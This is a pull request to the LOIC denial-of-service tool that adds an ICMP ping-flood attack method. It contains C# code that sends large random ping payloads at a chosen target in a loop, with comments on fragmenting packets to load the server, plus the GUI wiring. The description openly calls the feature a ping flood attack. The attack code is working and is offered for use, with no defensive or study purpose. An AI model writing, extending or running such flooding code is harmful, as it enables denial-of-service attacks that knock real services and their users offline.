### PR TITLE
James Matchett- Add ICMP attack method

### DIFF
--- a/src/Protocol.cs
+++ b/src/Protocol.cs
@@ -41,5 +41,11 @@ namespace LOIC {
 		/// XXX: Must be documented.
 		/// </summary>
 		ReCoil = 5,
+
+        ///<summary>
+        /// ICMP Protocol method
+        /// </summary>
+        ICMP = 6,
+
 	}
 }

--- a/src/cHLDos.cs
+++ b/src/cHLDos.cs
@@ -14,6 +14,7 @@ using System;
 using System.Collections.Generic;
 using System.ComponentModel;
 using System.Net;
+using System.Net.NetworkInformation;
 using System.Net.Sockets;
 using System.Text;
 using System.Text.RegularExpressions;
@@ -525,4 +526,125 @@ namespace LOIC
 			}
 		}
 	} // class SlowLoic
+
+
+     //start of ICMP class
+
+    public class ICMP : cHLDos
+    {
+   
+        private string _ip;
+        private int _port;
+        
+        private Random _random;
+        private int _PingsPerThread;
+        private byte[] _BytesToSend;
+        private Ping _pingSender;
+        private PingOptions _opt;
+        private bool _RandomMessage;
+        private BackgroundWorker bw;
+
+        /// <summary>
+        /// Create the ICMP object, because we need that, for reasons
+        /// </summary>
+
+        public ICMP(string ip, int port, bool RandomMessage, int PingsPerThread)
+        {
+           this._ip = ip;
+           this._port = port;
+           this._PingsPerThread = PingsPerThread;
+           this._pingSender = new Ping();
+           this._RandomMessage = RandomMessage;
+           this._BytesToSend = new byte[65000];
+           this._random = new Random();
+
+           this._opt = new PingOptions();
+           this._opt.DontFragment = false;
+           this._opt.Ttl = 128;
+
+            _opt = new PingOptions();
+            if (RandomMessage)
+            {
+                //if we're sending messages, fragment as greater processing power needed on server to reconstruct
+                _opt.DontFragment = false;
+            }else
+            {
+                //not sending messages, don't fragment, ddos through straight volume of requests
+                _opt.DontFragment = true;
+            }
+            //def ttl 
+           _opt.Ttl = 128;
+                            
+          
+        }
+
+       
+        public override void Start()
+        {
+            this.IsFlooding = true;
+            this.bw = new BackgroundWorker();
+            this.bw.DoWork += bw_DoWork;
+            this.bw.RunWorkerAsync();
+            this.bw.WorkerSupportsCancellation = true;
+        }
+      
+
+        public override void Stop()
+        {
+            this.IsFlooding = false;
+            this.bw.CancelAsync();
+        }
+       
+        //while working away
+        private  void bw_DoWork (object sender, EventArgs e){
+
+            while (this.IsFlooding)
+            {
+                _BytesToSend = new Byte[0];
+
+                if (_RandomMessage)
+                {
+                    _BytesToSend = new Byte[65500];
+                    //fill an array with 0 to 65499 random bytes bytes               
+                    int b = 0;
+                    while (b < _random.Next(0,65499))
+                    {
+                        this._BytesToSend[b] = Convert.ToByte(this._random.Next(0, 255));
+                        b++;
+                    }
+                }
+               
+                                                 
+                State = ReqState.Ready;
+
+                for (int i = 0; i < _PingsPerThread; i++)
+                {
+                    State = ReqState.Connecting;
+                    try
+                    {
+                        //send the data with a timeout value of 10ms 
+                        _pingSender.SendAsync(_ip, 10, _BytesToSend, _opt);
+                        Requested++;
+                    }
+                   
+                    catch (Exception)
+                    {
+                        Failed++;
+                    }
+                    //dispose of the pingSender because why do WE need to see the replies ;)
+                    try
+                    {
+                        _pingSender.SendAsyncCancel();
+                        _pingSender.Dispose();
+                       
+                    }
+                    catch { }
+                    State = ReqState.Completed;
+                }
+                State = ReqState.Ready;
+            }
+        
+          
+        }
+    }
 }

--- a/src/frmMain.Designer.cs
+++ b/src/frmMain.Designer.cs
@@ -469,7 +469,8 @@ namespace LOIC
             "UDP",
             "HTTP",
             "ReCoil",
-            "slowLOIC"});
+            "slowLOIC",
+            "ICMP"});
             this.cbMethod.Location = new System.Drawing.Point(75, 76);
             this.cbMethod.Name = "cbMethod";
             this.cbMethod.Size = new System.Drawing.Size(75, 22);

--- a/src/frmMain.cs
+++ b/src/frmMain.cs
@@ -199,6 +199,11 @@ namespace LOIC
 						ts = new XXPFlooder(sTargetIP, iPort, (int)protocol, iDelay, bResp, sData, chkMsgRandom.Checked);
 					}
 
+                    if (protocol == Protocol.ICMP)
+                    {
+                        ts = new ICMP(sTargetIP, iPort, chkMsgRandom.Checked, Convert.ToInt32((txtSLSpT.Text)));
+                    }
+
 					if(ts != null)
 					{
 						ts.Start();
@@ -1555,15 +1560,18 @@ namespace LOIC
 
 		private void cbMethod_SelectedIndexChanged(object sender, EventArgs e)
 		{
-			chkMsgRandom.Enabled = (bool)(cbMethod.SelectedIndex <= 1); // TCP_UDP
+			chkMsgRandom.Enabled = (bool)(cbMethod.SelectedIndex <= 1 || cbMethod.SelectedIndex == 5); // TCP_UDP or ICMP
 			txtData.Enabled      = (bool)(cbMethod.SelectedIndex <= 1); // TCP_UDP
-			chkRandom.Enabled    = (bool)(cbMethod.SelectedIndex >= 2); // HTTP_ReCoil_slowLoic
+			chkRandom.Enabled    = (bool)(cbMethod.SelectedIndex >= 2 && !(cbMethod.SelectedIndex == 5)); // HTTP_ReCoil_slowLoic
 			txtSubsite.Enabled   = (bool)(cbMethod.SelectedIndex >= 2); // HTTP_ReCoil_slowLoic
 
 			txtSLSpT.Enabled     = (bool)(cbMethod.SelectedIndex >= 3); // ReCoil_slowLoic
 			chkAllowGzip.Enabled = (bool)(cbMethod.SelectedIndex >= 2); // HTTP_ReCoil_slowLoic
-			chkWaitReply.Enabled = (bool)(cbMethod.SelectedIndex != 4); // TCP_UDP_HTTP_ReCoil
+			chkWaitReply.Enabled = (bool)(cbMethod.SelectedIndex != 4 && cbMethod.SelectedIndex != 5); // TCP_UDP_HTTP_ReCoil
 			chkUseGet.Enabled    = (bool)(cbMethod.SelectedIndex == 2 || cbMethod.SelectedIndex == 4); // HTTP_slowLoic
+
+            
+            
 		}
 
 		private void txtThreads_Leave(object sender, EventArgs e)
@@ -1577,5 +1585,7 @@ namespace LOIC
 				}
 			}
 		}
+
+       
 	}
 }


### PR DESCRIPTION
Third time's the charm, as per issue #64.

Adds the option for ICMP (ping flood) attacks either with no data in the buffer sent with the ping or a random amount of random bits (up to 65500) in the buffer.

Random bits selected with the "Append random chars" checkbox when ICMP is selected in the method box and number of pings per thread selected with Sockets/thread when ICMP is selected.

Hope this helps contribute towards the program, hope to help write further methods in the future

-with thanks, James